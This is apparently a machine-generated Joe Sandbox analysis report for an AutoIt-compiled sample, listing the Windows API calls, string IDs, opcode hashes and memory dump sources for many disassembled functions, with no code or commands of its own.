                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                      • Opcode ID: b30c1371c415c36d5561a11d95dd019c144de535b83a60ab203b907372a9035e
                                                                                                                                                                                                                                      • Instruction ID: aef00b95d69983a20ea9a175788b3350ef984223d52157e3b5fb633eb97d7ff9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b30c1371c415c36d5561a11d95dd019c144de535b83a60ab203b907372a9035e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E25169714187489BD320AF55EC89BAFBBE8FB84354F82884DF1D9510A1EB308439CB56
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?), ref: 00E841EE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EncodePointer
                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                      • Opcode ID: b80498507b369d9ab64ffd8537a06f5c3a73799d05ad17468288cbbd72f58c2d
                                                                                                                                                                                                                                      • Instruction ID: dae5ea22739be83c1c909a5dc7e807c2f48fabe065fd146a5d1c1c30b74fab17
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b80498507b369d9ab64ffd8537a06f5c3a73799d05ad17468288cbbd72f58c2d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 183158B190421AAFDF11EF54C841AADB7B5FF08318F195199F91C772A1C334AE60CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00EF3E86
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EF3EC1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                      • Opcode ID: c73753ac39b67ec6e459649dc16261baa0f73e9e6ddb3bc9881b629f8a5355ab
                                                                                                                                                                                                                                      • Instruction ID: 3b73e34530825bb0fc31f29878bdb04daad124ad715ebb9ff3f97cd80123832e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c73753ac39b67ec6e459649dc16261baa0f73e9e6ddb3bc9881b629f8a5355ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5231A171100208AEDB109F34DC80AFB77A9FF88724F00961EFAA9E7180DA30AD91C760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00EF4E86
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EF4E9B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID: '
                                                                                                                                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                      • Opcode ID: 970ca1417c41cb61b2f13de151028e97e5f56c8ee5dbc35542588865d96a907c
                                                                                                                                                                                                                                      • Instruction ID: c2d3cddb9c7b1f744a04224936822fb511ddc89a40d618175f4571fd946aecb7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 970ca1417c41cb61b2f13de151028e97e5f56c8ee5dbc35542588865d96a907c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E23107B4A0120D9FDB14CF69C981BEABBF6FF49314F10506AEA15AB395D730A941CF90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EE3BB4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00EE38D0,?,?), ref: 00EE3BD1
                                                                                                                                                                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EE38D3
                                                                                                                                                                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00EE395F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                                                                                                                                      • String ID: 255.255.255.255
                                                                                                                                                                                                                                      • API String ID: 2496851823-2422070025
                                                                                                                                                                                                                                      • Opcode ID: ce7c14ed2cc293cbeffb7e5cdf2e1100ba65089eca5cb5cb8d150ee72419becb
                                                                                                                                                                                                                                      • Instruction ID: 4640c042fa07e88ab196eb7a1b3f6b28c6261382aaeea740016f0932ac81e898
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce7c14ed2cc293cbeffb7e5cdf2e1100ba65089eca5cb5cb8d150ee72419becb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 213106352042898FC710CF3AC489E6977E1EF94318F249059E856AF797D772DE45CB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EF3AE1
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF3AEC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID: Combobox
                                                                                                                                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                      • Opcode ID: 5c67c3a2290504d45052c70e6f3deb7f853dff9133532d428c744c95c70ff65c
                                                                                                                                                                                                                                      • Instruction ID: a79d7e53df1722337bf3f0fc89b6be58662bef556ba7f00ce777f84260e90933
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c67c3a2290504d45052c70e6f3deb7f853dff9133532d428c744c95c70ff65c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B11B67130050D6FEF219F65DC81EFB3BABEB843A8F105125FA58AB290D671DD5187A0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E66653: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E66691
                                                                                                                                                                                                                                        • Part of subcall function 00E66653: GetStockObject.GDI32(00000011), ref: 00E666A5
                                                                                                                                                                                                                                        • Part of subcall function 00E66653: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E666AF
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00EF3FDF
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00EF3FF9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                      • Opcode ID: e87983b6d22b9ac4cd58c2efbdd0370ea306c4024ed24d49aec8a0e161aaa515
                                                                                                                                                                                                                                      • Instruction ID: cc871df72e27428afd64e0c3497c3b5e60ea839bcd53c9616894ca2c168d0263
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e87983b6d22b9ac4cd58c2efbdd0370ea306c4024ed24d49aec8a0e161aaa515
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17110672610209AFDB00DFA8CC45AFA7BA9EB48318F015915BA59E6150E675E8509B50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EDD5CD
                                                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EDD5F6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                                                                                                                                      • String ID: <local>
                                                                                                                                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                      • Opcode ID: c7bd8cacb258f5d8719c2c51851ee59515dbbbb04ed98e2ad567f37f0c93923e
                                                                                                                                                                                                                                      • Instruction ID: c42a8f28a3aaa7823e2108132565528bcf38414d670045c65a14ba936612ed91
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7bd8cacb258f5d8719c2c51851ee59515dbbbb04ed98e2ad567f37f0c93923e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2110671209632FAD7345B66AC45EF7BE9DEB127ACF005217B109A7280D6609945C6F0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00EF3D10
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EF3D1F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                      • Opcode ID: b675d65886c35c2167208025ab19795e5b5a241226db66d592f84309cc09a691
                                                                                                                                                                                                                                      • Instruction ID: 6d0fe05b63967b1280b721e217d1d5de66ab365ed2ac61f90e308b7f67ba42e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b675d65886c35c2167208025ab19795e5b5a241226db66d592f84309cc09a691
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96116A7150420CABEB118F74DC44AFB7BAAEB45368F606B14FA64B71D0C772DC50ABA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC4337: GetClassNameW.USER32(?,?,000000FF), ref: 00EC435A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EC23D6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 3678867486-1403004172
                                                                                                                                                                                                                                      • Opcode ID: b85530896d0a985b177056b7421aa07394b0e841d68b0e86beb64ad8e3aa2df0
                                                                                                                                                                                                                                      • Instruction ID: 9e094f38501f31aff93797aa39af3f8a0e072b2098aceb0bc3628bdc1ede42b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b85530896d0a985b177056b7421aa07394b0e841d68b0e86beb64ad8e3aa2df0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92014971A40215ABCB04A768CC61EFE37A8EB92354B00261DF932773C1DB36880E8610
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC4337: GetClassNameW.USER32(?,?,000000FF), ref: 00EC435A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00EC22D0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 3678867486-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 70ba15b140fe4ddf03d20ed016a33812895f5792892740ec9b118a79e686f6ad
                                                                                                                                                                                                                                      • Instruction ID: 668e9dae5a459d9c19963abc806193e365ef94ffcf7bc1686ca51655fc95d7bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70ba15b140fe4ddf03d20ed016a33812895f5792892740ec9b118a79e686f6ad
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2701F7B5A401086BCB18E790CE22FFE77E89B55384F14202DB902B72D5DE129E0E9671
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC4337: GetClassNameW.USER32(?,?,000000FF), ref: 00EC435A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00EC2352
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 3678867486-1403004172
                                                                                                                                                                                                                                      • Opcode ID: a5adb1e29e27256c92becdbe6b9b1b5e2963e69472918c7763e3526936ae05e1
                                                                                                                                                                                                                                      • Instruction ID: bdaf7dc6bac9f205fc088ff96cf8f40e682e9e7dfe2a9a5ae26a7f45673a1d48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5adb1e29e27256c92becdbe6b9b1b5e2963e69472918c7763e3526936ae05e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD01DBB5A4014966CB00E758DA12FFF77ECAB11744F14201D7902B72C1DE26CE0E9671
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC4337: GetClassNameW.USER32(?,?,000000FF), ref: 00EC435A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00EC245D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 3678867486-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 45a54dde127ae063963cea23409c066f00e4f3110d21be6cc3baad38c0b5dfbe
                                                                                                                                                                                                                                      • Instruction ID: b00312a63601c5d57ee519cf81c476e8d0f90763078dabb6429d10cf51302977
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45a54dde127ae063963cea23409c066f00e4f3110d21be6cc3baad38c0b5dfbe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F0F9B1E4021467CB08E7649C51FFE77B8BB01744F04251DB971B72C1DF61980E8660
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EC11AD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                      • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                      • Opcode ID: 0dda693f0992701eb411b7f7ffdb94925cfe4ddd7e217d163a463dd41a328826
                                                                                                                                                                                                                                      • Instruction ID: caacc8388a48d6578633fc7f9e9273e6f8baeaa63e18a58f9d20cf031a352f00
